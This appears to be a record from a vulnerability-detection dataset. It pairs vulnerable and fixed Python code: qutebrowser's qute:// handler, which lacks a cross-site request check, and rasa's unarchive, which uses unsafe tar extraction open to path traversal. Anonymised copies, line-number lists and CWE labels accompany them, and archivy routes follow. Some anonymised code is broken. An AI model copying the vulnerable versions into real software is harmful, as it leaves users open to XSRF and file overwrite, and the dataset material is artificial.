# FIXME:qtwebengine how do we show a better error here?
log.misc.exception("Error while handling qute://* URL")
job.fail(QWebEngineUrlRequestJob.RequestFailed)
except qutescheme.Redirect as e:
qtutils.ensure_valid(e.url)
job.redirect(e.url)
else:
log.misc.debug("Returning {} data".format(mimetype))
# We can't just use the QBuffer constructor taking a QByteArray,
# because that somehow segfaults...
# https://www.riverbankcomputing.com/pipermail/pyqt/2016-September/038075.html
buf = QBuffer(parent=self)
buf.open(QIODevice.WriteOnly)
buf.write(data)
buf.seek(0)
buf.close()
job.reply(mimetype.encode('ascii'), buf)
| xsrf | {
"code": [
" assert job.requestMethod() == b'GET'"
],
"line_no": [
58
]
} | {
"code": [
" try:",
" initiator = job.initiator()",
" except AttributeError:",
" pass",
" else:",
" if initiator.isValid() and initiator.scheme() != 'qute':",
" .format(initiator.toDisplayString(),",
" url.toDisplayString()))",
" job.fail(QWebEngineUrlRequestJob.RequestDenied)",
" if job.requestMethod() != b'GET':",
" job.fail(QWebEngineUrlRequestJob.RequestDenied)",
" return"
],
"line_no": [
61,
62,
63,
65,
66,
67,
69,
70,
71,
74,
75,
76
]
} |
from PyQt5.QtCore import QBuffer, QIODevice
from PyQt5.QtWebEngineCore import (QWebEngineUrlSchemeHandler,
QWebEngineUrlRequestJob)
from qutebrowser.browser import qutescheme
from qutebrowser.utils import log, qtutils
class CLASS_0(QWebEngineUrlSchemeHandler):
def FUNC_0(self, VAR_0):
VAR_0.installUrlSchemeHandler(b'qute', self)
if qtutils.version_check('5.11', compiled=False):
VAR_0.installUrlSchemeHandler(b'chrome-error', self)
VAR_0.installUrlSchemeHandler(b'chrome-extension', self)
def FUNC_1(self, VAR_1):
VAR_2 = VAR_1.requestUrl()
if VAR_2.scheme() in ['chrome-error', 'chrome-extension']:
VAR_1.fail(QWebEngineUrlRequestJob.UrlInvalid)
return
assert VAR_1.requestMethod() == b'GET'
assert VAR_2.scheme() == 'qute'
log.misc.debug("Got request for {}".format(VAR_2.toDisplayString()))
try:
VAR_3, VAR_4 = qutescheme.data_for_url(VAR_2)
except qutescheme.NoHandlerFound:
log.misc.debug("No handler found for {}".format(
VAR_2.toDisplayString()))
VAR_1.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeOSError:
log.misc.exception("OSError while handling qute://* URL")
VAR_1.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeError:
log.misc.exception("Error while handling qute://* URL")
VAR_1.fail(QWebEngineUrlRequestJob.RequestFailed)
except qutescheme.Redirect as e:
qtutils.ensure_valid(e.url)
VAR_1.redirect(e.url)
else:
log.misc.debug("Returning {} data".format(VAR_3))
VAR_5 = QBuffer(parent=self)
VAR_5.open(QIODevice.WriteOnly)
VAR_5.write(VAR_4)
VAR_5.seek(0)
VAR_5.close()
VAR_1.reply(VAR_3.encode('ascii'), VAR_5)
|
from PyQt5.QtCore import QBuffer, QIODevice
from PyQt5.QtWebEngineCore import (QWebEngineUrlSchemeHandler,
QWebEngineUrlRequestJob)
from qutebrowser.browser import qutescheme
from qutebrowser.utils import log, qtutils
class CLASS_0(QWebEngineUrlSchemeHandler):
def FUNC_0(self, VAR_0):
VAR_0.installUrlSchemeHandler(b'qute', self)
if qtutils.version_check('5.11', compiled=False):
VAR_0.installUrlSchemeHandler(b'chrome-error', self)
VAR_0.installUrlSchemeHandler(b'chrome-extension', self)
def FUNC_1(self, VAR_1):
VAR_2 = VAR_1.requestUrl()
if VAR_2.scheme() in ['chrome-error', 'chrome-extension']:
VAR_1.fail(QWebEngineUrlRequestJob.UrlInvalid)
return
try:
VAR_3 = VAR_1.initiator()
except AttributeError:
pass
else:
if VAR_3.isValid() and VAR_3.scheme() != 'qute':
log.misc.warning("Blocking malicious request from {} to {}"
.format(VAR_3.toDisplayString(),
VAR_2.toDisplayString()))
VAR_1.fail(QWebEngineUrlRequestJob.RequestDenied)
return
if VAR_1.requestMethod() != b'GET':
VAR_1.fail(QWebEngineUrlRequestJob.RequestDenied)
return
assert VAR_2.scheme() == 'qute'
log.misc.debug("Got request for {}".format(VAR_2.toDisplayString()))
try:
VAR_4, VAR_5 = qutescheme.data_for_url(VAR_2)
except qutescheme.NoHandlerFound:
log.misc.debug("No handler found for {}".format(
VAR_2.toDisplayString()))
VAR_1.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeOSError:
log.misc.exception("OSError while handling qute://* URL")
VAR_1.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeError:
log.misc.exception("Error while handling qute://* URL")
VAR_1.fail(QWebEngineUrlRequestJob.RequestFailed)
except qutescheme.Redirect as e:
qtutils.ensure_valid(e.url)
VAR_1.redirect(e.url)
else:
log.misc.debug("Returning {} data".format(VAR_4))
VAR_6 = QBuffer(parent=self)
VAR_6.open(QIODevice.WriteOnly)
VAR_6.write(VAR_5)
VAR_6.seek(0)
VAR_6.close()
VAR_1.reply(VAR_4.encode('ascii'), VAR_6)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
25,
28,
29,
31,
33,
38,
41,
44,
47,
52,
54,
57,
68,
72,
80,
81,
82,
83,
90,
20,
32,
35,
43,
44,
45,
46,
47,
48,
49,
50
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
25,
28,
29,
31,
33,
38,
41,
44,
47,
52,
54,
57,
58,
59,
60,
64,
73,
77,
79,
88,
92,
100,
101,
102,
103,
110,
20,
32,
35,
43,
44,
45,
46,
47,
48,
49,
50
] |
0CWE-22
| import asyncio
import logging
import os
import pickle
import tarfile
import tempfile
import warnings
import zipfile
import re
from asyncio import AbstractEventLoop
from io import BytesIO as IOReader
from pathlib import Path
from typing import Text, Any, Union, List, Type, Callable, TYPE_CHECKING, Pattern
import rasa.shared.constants
import rasa.shared.utils.io
if TYPE_CHECKING:
from prompt_toolkit.validation import Validator
def configure_colored_logging(loglevel: Text) -> None:
import coloredlogs
loglevel = loglevel or os.environ.get(
rasa.shared.constants.ENV_LOG_LEVEL, rasa.shared.constants.DEFAULT_LOG_LEVEL
)
field_styles = coloredlogs.DEFAULT_FIELD_STYLES.copy()
field_styles["asctime"] = {}
level_styles = coloredlogs.DEFAULT_LEVEL_STYLES.copy()
level_styles["debug"] = {}
coloredlogs.install(
level=loglevel,
use_chroot=False,
fmt="%(asctime)s %(levelname)-8s %(name)s - %(message)s",
level_styles=level_styles,
field_styles=field_styles,
)
def enable_async_loop_debugging(
event_loop: AbstractEventLoop, slow_callback_duration: float = 0.1
) -> AbstractEventLoop:
logging.info(
"Enabling coroutine debugging. Loop id {}.".format(id(asyncio.get_event_loop()))
)
# Enable debugging
event_loop.set_debug(True)
# Make the threshold for "slow" tasks very very small for
# illustration. The default is 0.1 (= 100 milliseconds).
event_loop.slow_callback_duration = slow_callback_duration
# Report all mistakes managing asynchronous resources.
warnings.simplefilter("always", ResourceWarning)
return event_loop
def pickle_dump(filename: Union[Text, Path], obj: Any) -> None:
"""Saves object to file.
Args:
filename: the filename to save the object to
obj: the object to store
"""
with open(filename, "wb") as f:
pickle.dump(obj, f)
def pickle_load(filename: Union[Text, Path]) -> Any:
"""Loads an object from a file.
Args:
filename: the filename to load the object from
Returns: the loaded object
"""
with open(filename, "rb") as f:
return pickle.load(f)
def unarchive(byte_array: bytes, directory: Text) -> Text:
"""Tries to unpack a byte array interpreting it as an archive.
Tries to use tar first to unpack, if that fails, zip will be used."""
try:
tar = tarfile.open(fileobj=IOReader(byte_array))
tar.extractall(directory)
tar.close()
return directory
except tarfile.TarError:
zip_ref = zipfile.ZipFile(IOReader(byte_array))
zip_ref.extractall(directory)
zip_ref.close()
return directory
def create_temporary_file(data: Any, suffix: Text = "", mode: Text = "w+") -> Text:
"""Creates a tempfile.NamedTemporaryFile object for data.
mode defines NamedTemporaryFile's mode parameter in py3."""
encoding = None if "b" in mode else rasa.shared.utils.io.DEFAULT_ENCODING
f = tempfile.NamedTemporaryFile(
mode=mode, suffix=suffix, delete=False, encoding=encoding
)
f.write(data)
f.close()
return f.name
def create_temporary_directory() -> Text:
"""Creates a tempfile.TemporaryDirectory."""
f = tempfile.TemporaryDirectory()
return f.name
def create_path(file_path: Text) -> None:
"""Makes sure all directories in the 'file_path' exists."""
parent_dir = os.path.dirname(os.path.abspath(file_path))
if not os.path.exists(parent_dir):
os.makedirs(parent_dir)
def file_type_validator(
valid_file_types: List[Text], error_message: Text
) -> Type["Validator"]:
"""Creates a `Validator` class which can be used with `questionary` to validate
file paths.
"""
def is_valid(path: Text) -> bool:
return path is not None and any(
[path.endswith(file_type) for file_type in valid_file_types]
)
return create_validator(is_valid, error_message)
def not_empty_validator(error_message: Text) -> Type["Validator"]:
"""Creates a `Validator` class which can be used with `questionary` to validate
that the user entered something other than whitespace.
"""
def is_valid(input: Text) -> bool:
return input is not None and input.strip() != ""
return create_validator(is_valid, error_message)
def create_validator(
function: Callable[[Text], bool], error_message: Text
) -> Type["Validator"]:
"""Helper method to create `Validator` classes from callable functions. Should be
removed when questionary supports `Validator` objects."""
from prompt_toolkit.validation import Validator, ValidationError
from prompt_toolkit.document import Document
class FunctionValidator(Validator):
@staticmethod
def validate(document: Document) -> None:
is_valid = function(document.text)
if not is_valid:
raise ValidationError(message=error_message)
return FunctionValidator
def json_unpickle(file_name: Union[Text, Path]) -> Any:
"""Unpickle an object from file using json.
Args:
file_name: the file to load the object from
Returns: the object
"""
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
file_content = rasa.shared.utils.io.read_file(file_name)
return jsonpickle.loads(file_content)
def json_pickle(file_name: Union[Text, Path], obj: Any) -> None:
"""Pickle an object to a file using json.
Args:
file_name: the file to store the object to
obj: the object to store
"""
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
rasa.shared.utils.io.write_text_file(jsonpickle.dumps(obj), file_name)
def get_emoji_regex() -> Pattern:
"""Returns regex to identify emojis."""
return re.compile(
"["
"\U0001F600-\U0001F64F" # emoticons
"\U0001F300-\U0001F5FF" # symbols & pictographs
"\U0001F680-\U0001F6FF" # transport & map symbols
"\U0001F1E0-\U0001F1FF" # flags (iOS)
"\U00002702-\U000027B0"
"\U000024C2-\U0001F251"
"\u200d" # zero width joiner
"\u200c" # zero width non-joiner
"]+",
flags=re.UNICODE,
)
| import asyncio
import logging
import os
import pickle
import tarfile
from tarsafe import TarSafe
import tempfile
import warnings
import zipfile
import re
from asyncio import AbstractEventLoop
from io import BytesIO as IOReader
from pathlib import Path
from typing import Text, Any, Union, List, Type, Callable, TYPE_CHECKING, Pattern
import rasa.shared.constants
import rasa.shared.utils.io
if TYPE_CHECKING:
from prompt_toolkit.validation import Validator
def configure_colored_logging(loglevel: Text) -> None:
import coloredlogs
loglevel = loglevel or os.environ.get(
rasa.shared.constants.ENV_LOG_LEVEL, rasa.shared.constants.DEFAULT_LOG_LEVEL
)
field_styles = coloredlogs.DEFAULT_FIELD_STYLES.copy()
field_styles["asctime"] = {}
level_styles = coloredlogs.DEFAULT_LEVEL_STYLES.copy()
level_styles["debug"] = {}
coloredlogs.install(
level=loglevel,
use_chroot=False,
fmt="%(asctime)s %(levelname)-8s %(name)s - %(message)s",
level_styles=level_styles,
field_styles=field_styles,
)
def enable_async_loop_debugging(
event_loop: AbstractEventLoop, slow_callback_duration: float = 0.1
) -> AbstractEventLoop:
logging.info(
"Enabling coroutine debugging. Loop id {}.".format(id(asyncio.get_event_loop()))
)
# Enable debugging
event_loop.set_debug(True)
# Make the threshold for "slow" tasks very very small for
# illustration. The default is 0.1 (= 100 milliseconds).
event_loop.slow_callback_duration = slow_callback_duration
# Report all mistakes managing asynchronous resources.
warnings.simplefilter("always", ResourceWarning)
return event_loop
def pickle_dump(filename: Union[Text, Path], obj: Any) -> None:
"""Saves object to file.
Args:
filename: the filename to save the object to
obj: the object to store
"""
with open(filename, "wb") as f:
pickle.dump(obj, f)
def pickle_load(filename: Union[Text, Path]) -> Any:
"""Loads an object from a file.
Args:
filename: the filename to load the object from
Returns: the loaded object
"""
with open(filename, "rb") as f:
return pickle.load(f)
def unarchive(byte_array: bytes, directory: Text) -> Text:
"""Tries to unpack a byte array interpreting it as an archive.
Tries to use tar first to unpack, if that fails, zip will be used."""
try:
tar = TarSafe.open(fileobj=IOReader(byte_array))
tar.extractall(directory)
tar.close()
return directory
except tarfile.TarError:
zip_ref = zipfile.ZipFile(IOReader(byte_array))
zip_ref.extractall(directory)
zip_ref.close()
return directory
def create_temporary_file(data: Any, suffix: Text = "", mode: Text = "w+") -> Text:
"""Creates a tempfile.NamedTemporaryFile object for data.
mode defines NamedTemporaryFile's mode parameter in py3."""
encoding = None if "b" in mode else rasa.shared.utils.io.DEFAULT_ENCODING
f = tempfile.NamedTemporaryFile(
mode=mode, suffix=suffix, delete=False, encoding=encoding
)
f.write(data)
f.close()
return f.name
def create_temporary_directory() -> Text:
"""Creates a tempfile.TemporaryDirectory."""
f = tempfile.TemporaryDirectory()
return f.name
def create_path(file_path: Text) -> None:
"""Makes sure all directories in the 'file_path' exists."""
parent_dir = os.path.dirname(os.path.abspath(file_path))
if not os.path.exists(parent_dir):
os.makedirs(parent_dir)
def file_type_validator(
valid_file_types: List[Text], error_message: Text
) -> Type["Validator"]:
"""Creates a `Validator` class which can be used with `questionary` to validate
file paths.
"""
def is_valid(path: Text) -> bool:
return path is not None and any(
[path.endswith(file_type) for file_type in valid_file_types]
)
return create_validator(is_valid, error_message)
def not_empty_validator(error_message: Text) -> Type["Validator"]:
"""Creates a `Validator` class which can be used with `questionary` to validate
that the user entered something other than whitespace.
"""
def is_valid(input: Text) -> bool:
return input is not None and input.strip() != ""
return create_validator(is_valid, error_message)
def create_validator(
function: Callable[[Text], bool], error_message: Text
) -> Type["Validator"]:
"""Helper method to create `Validator` classes from callable functions. Should be
removed when questionary supports `Validator` objects."""
from prompt_toolkit.validation import Validator, ValidationError
from prompt_toolkit.document import Document
class FunctionValidator(Validator):
@staticmethod
def validate(document: Document) -> None:
is_valid = function(document.text)
if not is_valid:
raise ValidationError(message=error_message)
return FunctionValidator
def json_unpickle(file_name: Union[Text, Path]) -> Any:
"""Unpickle an object from file using json.
Args:
file_name: the file to load the object from
Returns: the object
"""
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
file_content = rasa.shared.utils.io.read_file(file_name)
return jsonpickle.loads(file_content)
def json_pickle(file_name: Union[Text, Path], obj: Any) -> None:
"""Pickle an object to a file using json.
Args:
file_name: the file to store the object to
obj: the object to store
"""
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
rasa.shared.utils.io.write_text_file(jsonpickle.dumps(obj), file_name)
def get_emoji_regex() -> Pattern:
"""Returns regex to identify emojis."""
return re.compile(
"["
"\U0001F600-\U0001F64F" # emoticons
"\U0001F300-\U0001F5FF" # symbols & pictographs
"\U0001F680-\U0001F6FF" # transport & map symbols
"\U0001F1E0-\U0001F1FF" # flags (iOS)
"\U00002702-\U000027B0"
"\U000024C2-\U0001F251"
"\u200d" # zero width joiner
"\u200c" # zero width non-joiner
"]+",
flags=re.UNICODE,
)
| path_disclosure | {
"code": [
" tar = tarfile.open(fileobj=IOReader(byte_array))"
],
"line_no": [
90
]
} | {
"code": [
"from tarsafe import TarSafe",
" tar = TarSafe.open(fileobj=IOReader(byte_array))"
],
"line_no": [
6,
91
]
} | import asyncio
import logging
import os
import pickle
import .tarfile
import tempfile
import warnings
import zipfile
import re
from asyncio import AbstractEventLoop
from io import BytesIO as IOReader
from pathlib import Path
from typing import Text, Any, Union, List, Type, Callable, TYPE_CHECKING, Pattern
import rasa.shared.constants
import rasa.shared.utils.io
if TYPE_CHECKING:
from prompt_toolkit.validation import Validator
def FUNC_0(VAR_0: Text) -> None:
import coloredlogs
VAR_0 = loglevel or os.environ.get(
rasa.shared.constants.ENV_LOG_LEVEL, rasa.shared.constants.DEFAULT_LOG_LEVEL
)
VAR_15 = coloredlogs.DEFAULT_FIELD_STYLES.copy()
VAR_15["asctime"] = {}
VAR_16 = coloredlogs.DEFAULT_LEVEL_STYLES.copy()
VAR_16["debug"] = {}
coloredlogs.install(
level=VAR_0,
use_chroot=False,
fmt="%(asctime)s %(levelname)-8s %(name)s - %(message)s",
VAR_16=level_styles,
VAR_15=field_styles,
)
def FUNC_1(
VAR_1: AbstractEventLoop, VAR_2: float = 0.1
) -> AbstractEventLoop:
logging.info(
"Enabling coroutine debugging. Loop id {}.".format(id(asyncio.get_event_loop()))
)
VAR_1.set_debug(True)
VAR_1.slow_callback_duration = VAR_2
warnings.simplefilter("always", ResourceWarning)
return VAR_1
def FUNC_2(VAR_3: Union[Text, Path], VAR_4: Any) -> None:
with open(VAR_3, "wb") as VAR_18:
pickle.dump(VAR_4, VAR_18)
def FUNC_3(VAR_3: Union[Text, Path]) -> Any:
with open(VAR_3, "rb") as VAR_18:
return pickle.load(VAR_18)
def FUNC_4(VAR_5: bytes, VAR_6: Text) -> Text:
try:
VAR_23 = tarfile.open(fileobj=IOReader(VAR_5))
VAR_23.extractall(VAR_6)
VAR_23.close()
return VAR_6
except tarfile.TarError:
VAR_25 = zipfile.ZipFile(IOReader(VAR_5))
VAR_25.extractall(VAR_6)
VAR_25.close()
return VAR_6
def FUNC_5(VAR_7: Any, VAR_8: Text = "", VAR_9: Text = "w+") -> Text:
VAR_17 = None if "b" in VAR_9 else rasa.shared.utils.io.DEFAULT_ENCODING
VAR_18 = tempfile.NamedTemporaryFile(
VAR_9=mode, VAR_8=suffix, delete=False, VAR_17=encoding
)
VAR_18.write(VAR_7)
VAR_18.close()
return VAR_18.name
def FUNC_6() -> Text:
VAR_18 = tempfile.TemporaryDirectory()
return VAR_18.name
def FUNC_7(VAR_10: Text) -> None:
VAR_19 = os.path.dirname(os.path.abspath(VAR_10))
if not os.path.exists(VAR_19):
os.makedirs(VAR_19)
def FUNC_8(
VAR_11: List[Text], VAR_12: Text
) -> Type["Validator"]:
def VAR_26(VAR_20: Text) -> bool:
return VAR_20 is not None and any(
[VAR_20.endswith(file_type) for file_type in VAR_11]
)
return FUNC_10(VAR_26, VAR_12)
def FUNC_9(VAR_12: Text) -> Type["Validator"]:
def VAR_26(VAR_21: Text) -> bool:
return VAR_21 is not None and VAR_21.strip() != ""
return FUNC_10(VAR_26, VAR_12)
def FUNC_10(
VAR_13: Callable[[Text], bool], VAR_12: Text
) -> Type["Validator"]:
from prompt_toolkit.validation import Validator, ValidationError
from prompt_toolkit.document import Document
class CLASS_0(Validator):
@staticmethod
def FUNC_15(VAR_24: Document) -> None:
VAR_26 = VAR_13(VAR_24.text)
if not VAR_26:
raise ValidationError(message=VAR_12)
return CLASS_0
def FUNC_11(VAR_14: Union[Text, Path]) -> Any:
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
VAR_22 = rasa.shared.utils.io.read_file(VAR_14)
return jsonpickle.loads(VAR_22)
def FUNC_12(VAR_14: Union[Text, Path], VAR_4: Any) -> None:
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
rasa.shared.utils.io.write_text_file(jsonpickle.dumps(VAR_4), VAR_14)
def FUNC_13() -> Pattern:
return re.compile(
"["
"\U0001F600-\U0001F64F" # emoticons
"\U0001F300-\U0001F5FF" # symbols & pictographs
"\U0001F680-\U0001F6FF" # transport & map symbols
"\U0001F1E0-\U0001F1FF" # flags (iOS)
"\U00002702-\U000027B0"
"\U000024C2-\U0001F251"
"\u200d" # zero width joiner
"\u200c" # zero width non-joiner
"]+",
flags=re.UNICODE,
)
| import asyncio
import logging
import os
import pickle
import .tarfile
from tarsafe import TarSafe
import tempfile
import warnings
import zipfile
import re
from asyncio import AbstractEventLoop
from io import BytesIO as IOReader
from pathlib import Path
from typing import Text, Any, Union, List, Type, Callable, TYPE_CHECKING, Pattern
import rasa.shared.constants
import rasa.shared.utils.io
if TYPE_CHECKING:
from prompt_toolkit.validation import Validator
def FUNC_0(VAR_0: Text) -> None:
import coloredlogs
VAR_0 = loglevel or os.environ.get(
rasa.shared.constants.ENV_LOG_LEVEL, rasa.shared.constants.DEFAULT_LOG_LEVEL
)
VAR_15 = coloredlogs.DEFAULT_FIELD_STYLES.copy()
VAR_15["asctime"] = {}
VAR_16 = coloredlogs.DEFAULT_LEVEL_STYLES.copy()
VAR_16["debug"] = {}
coloredlogs.install(
level=VAR_0,
use_chroot=False,
fmt="%(asctime)s %(levelname)-8s %(name)s - %(message)s",
VAR_16=level_styles,
VAR_15=field_styles,
)
def FUNC_1(
VAR_1: AbstractEventLoop, VAR_2: float = 0.1
) -> AbstractEventLoop:
logging.info(
"Enabling coroutine debugging. Loop id {}.".format(id(asyncio.get_event_loop()))
)
VAR_1.set_debug(True)
VAR_1.slow_callback_duration = VAR_2
warnings.simplefilter("always", ResourceWarning)
return VAR_1
def FUNC_2(VAR_3: Union[Text, Path], VAR_4: Any) -> None:
with open(VAR_3, "wb") as VAR_18:
pickle.dump(VAR_4, VAR_18)
def FUNC_3(VAR_3: Union[Text, Path]) -> Any:
with open(VAR_3, "rb") as VAR_18:
return pickle.load(VAR_18)
def FUNC_4(VAR_5: bytes, VAR_6: Text) -> Text:
try:
VAR_23 = TarSafe.open(fileobj=IOReader(VAR_5))
VAR_23.extractall(VAR_6)
VAR_23.close()
return VAR_6
except tarfile.TarError:
VAR_25 = zipfile.ZipFile(IOReader(VAR_5))
VAR_25.extractall(VAR_6)
VAR_25.close()
return VAR_6
def FUNC_5(VAR_7: Any, VAR_8: Text = "", VAR_9: Text = "w+") -> Text:
VAR_17 = None if "b" in VAR_9 else rasa.shared.utils.io.DEFAULT_ENCODING
VAR_18 = tempfile.NamedTemporaryFile(
VAR_9=mode, VAR_8=suffix, delete=False, VAR_17=encoding
)
VAR_18.write(VAR_7)
VAR_18.close()
return VAR_18.name
def FUNC_6() -> Text:
VAR_18 = tempfile.TemporaryDirectory()
return VAR_18.name
def FUNC_7(VAR_10: Text) -> None:
VAR_19 = os.path.dirname(os.path.abspath(VAR_10))
if not os.path.exists(VAR_19):
os.makedirs(VAR_19)
def FUNC_8(
VAR_11: List[Text], VAR_12: Text
) -> Type["Validator"]:
def VAR_26(VAR_20: Text) -> bool:
return VAR_20 is not None and any(
[VAR_20.endswith(file_type) for file_type in VAR_11]
)
return FUNC_10(VAR_26, VAR_12)
def FUNC_9(VAR_12: Text) -> Type["Validator"]:
def VAR_26(VAR_21: Text) -> bool:
return VAR_21 is not None and VAR_21.strip() != ""
return FUNC_10(VAR_26, VAR_12)
def FUNC_10(
VAR_13: Callable[[Text], bool], VAR_12: Text
) -> Type["Validator"]:
from prompt_toolkit.validation import Validator, ValidationError
from prompt_toolkit.document import Document
class CLASS_0(Validator):
@staticmethod
def FUNC_15(VAR_24: Document) -> None:
VAR_26 = VAR_13(VAR_24.text)
if not VAR_26:
raise ValidationError(message=VAR_12)
return CLASS_0
def FUNC_11(VAR_14: Union[Text, Path]) -> Any:
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
VAR_22 = rasa.shared.utils.io.read_file(VAR_14)
return jsonpickle.loads(VAR_22)
def FUNC_12(VAR_14: Union[Text, Path], VAR_4: Any) -> None:
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
rasa.shared.utils.io.write_text_file(jsonpickle.dumps(VAR_4), VAR_14)
def FUNC_13() -> Pattern:
return re.compile(
"["
"\U0001F600-\U0001F64F" # emoticons
"\U0001F300-\U0001F5FF" # symbols & pictographs
"\U0001F680-\U0001F6FF" # transport & map symbols
"\U0001F1E0-\U0001F1FF" # flags (iOS)
"\U00002702-\U000027B0"
"\U000024C2-\U0001F251"
"\u200d" # zero width joiner
"\u200c" # zero width non-joiner
"]+",
flags=re.UNICODE,
)
| [
14,
17,
20,
21,
24,
28,
40,
41,
48,
49,
51,
52,
53,
55,
56,
59,
60,
63,
70,
71,
74,
77,
82,
83,
86,
88,
99,
100,
103,
105,
111,
114,
115,
120,
121,
124,
128,
129,
136,
141,
143,
144,
149,
152,
154,
155,
161,
164,
171,
173,
174,
177,
180,
185,
187,
190,
191,
194,
201,
203,
205,
206,
222,
62,
63,
64,
65,
66,
67,
73,
74,
75,
76,
77,
78,
79,
85,
86,
87,
102,
103,
104,
117,
123,
133,
134,
135,
146,
147,
148,
159,
160,
176,
177,
178,
179,
180,
181,
182,
193,
194,
195,
196,
197,
198,
208
] | [
15,
18,
21,
22,
25,
29,
41,
42,
49,
50,
52,
53,
54,
56,
57,
60,
61,
64,
71,
72,
75,
78,
83,
84,
87,
89,
100,
101,
104,
106,
112,
115,
116,
121,
122,
125,
129,
130,
137,
142,
144,
145,
150,
153,
155,
156,
162,
165,
172,
174,
175,
178,
181,
186,
188,
191,
192,
195,
202,
204,
206,
207,
223,
63,
64,
65,
66,
67,
68,
74,
75,
76,
77,
78,
79,
80,
86,
87,
88,
103,
104,
105,
118,
124,
134,
135,
136,
147,
148,
149,
160,
161,
177,
178,
179,
180,
181,
182,
183,
194,
195,
196,
197,
198,
199,
209
] |
4CWE-601
| from pathlib import Path
from os.path import sep
from pkg_resources import require
from shutil import which
import frontmatter
from flask import (
render_template,
flash,
redirect,
request,
url_for,
send_file,
send_from_directory,
)
from flask_login import login_user, current_user, logout_user
from tinydb import Query
from werkzeug.security import check_password_hash, generate_password_hash
from archivy.models import DataObj, User
from archivy import data, app, forms, csrf
from archivy.helpers import get_db, write_config
from archivy.tags import get_all_tags
from archivy.search import search, search_frontmatter_tags
from archivy.config import Config
import re
@app.context_processor
def pass_defaults():
dataobjs = data.get_items(load_content=False)
version = require("archivy")[0].version
SEP = sep
# check windows parsing for js (https://github.com/Uzay-G/archivy/issues/115)
if SEP == "\\":
SEP += "\\"
return dict(dataobjs=dataobjs, SEP=SEP, version=version)
@app.before_request
def check_perms():
allowed_path = (
request.path.startswith("/login")
or request.path.startswith("/static")
or request.path.startswith("/api/login")
)
if not current_user.is_authenticated and not allowed_path:
return redirect(url_for("login", next=request.path))
return
@app.route("/")
@app.route("/index")
def index():
path = request.args.get("path", "").lstrip("/")
try:
files = data.get_items(path=path)
except FileNotFoundError:
flash("Directory does not exist.", "error")
return redirect("/")
return render_template(
"home.html",
title=path or "root",
search_enabled=app.config["SEARCH_CONF"]["enabled"],
dir=files,
current_path=path,
new_folder_form=forms.NewFolderForm(),
delete_form=forms.DeleteFolderForm(),
rename_form=forms.RenameDirectoryForm(),
view_only=0,
search_engine=app.config["SEARCH_CONF"]["engine"],
)
# TODO: refactor two following methods
@app.route("/bookmarks/new", methods=["GET", "POST"])
def new_bookmark():
default_dir = app.config.get("DEFAULT_BOOKMARKS_DIR", "root directory")
form = forms.NewBookmarkForm(path=default_dir)
form.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if form.validate_on_submit():
path = form.path.data
tags = form.tags.data.split(",") if form.tags.data != "" else []
tags = [tag.strip() for tag in tags]
bookmark = DataObj(url=form.url.data, tags=tags, path=path, type="bookmark")
bookmark.process_bookmark_url()
bookmark_id = bookmark.insert()
if bookmark_id:
flash("Bookmark Saved!", "success")
return redirect(f"/dataobj/{bookmark_id}")
else:
flash(bookmark.error, "error")
return redirect("/bookmarks/new")
# for bookmarklet
form.url.data = request.args.get("url", "")
path = request.args.get("path", default_dir).strip("/")
# handle empty argument
form.path.data = path
return render_template("dataobjs/new.html", title="New Bookmark", form=form)
@app.route("/notes/new", methods=["GET", "POST"])
def new_note():
form = forms.NewNoteForm()
default_dir = "root directory"
form.path.choices = [("", default_dir)] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if form.validate_on_submit():
path = form.path.data
tags = form.tags.data.split(",") if form.tags.data != "" else []
tags = [tag.strip() for tag in tags]
note = DataObj(title=form.title.data, path=path, tags=tags, type="note")
note_id = note.insert()
if note_id:
flash("Note Saved!", "success")
return redirect(f"/dataobj/{note_id}")
path = request.args.get("path", default_dir).strip("/")
# handle empty argument
form.path.data = path
return render_template("/dataobjs/new.html", title="New Note", form=form)
@app.route("/tags")
def show_all_tags():
if not app.config["SEARCH_CONF"]["engine"] == "ripgrep" and not which("rg"):
flash("Ripgrep must be installed to view pages about embedded tags.", "error")
return redirect("/")
tags = sorted(get_all_tags(force=True))
return render_template("tags/all.html", title="All Tags", tags=tags)
@app.route("/tags/<tag_name>")
def show_tag(tag_name):
if not app.config["SEARCH_CONF"]["enabled"] and not which("rg"):
flash(
"Search (for example ripgrep) must be installed to view pages about embedded tags.",
"error",
)
return redirect("/")
results = search(f"#{tag_name}#", strict=True)
res_ids = set(
[item["id"] for item in results]
) # avoid duplication of results between context-aware embedded tags and metadata ones
for res in search_frontmatter_tags(tag_name):
if res["id"] not in res_ids:
results.append(res)
return render_template(
"tags/show.html",
title=f"Tags - {tag_name}",
tag_name=tag_name,
search_result=results,
)
@app.route("/dataobj/<int:dataobj_id>")
def show_dataobj(dataobj_id):
dataobj = data.get_item(dataobj_id)
get_title_id_pairs = lambda x: (x["title"], x["id"])
titles = list(
map(get_title_id_pairs, data.get_items(structured=False, load_content=False))
)
if not dataobj:
flash("Data could not be found!", "error")
return redirect("/")
if request.args.get("raw") == "1":
return frontmatter.dumps(dataobj)
backlinks = []
if app.config["SEARCH_CONF"]["enabled"]:
if app.config["SEARCH_CONF"]["engine"] == "ripgrep":
query = f"\|{dataobj_id}]]"
else:
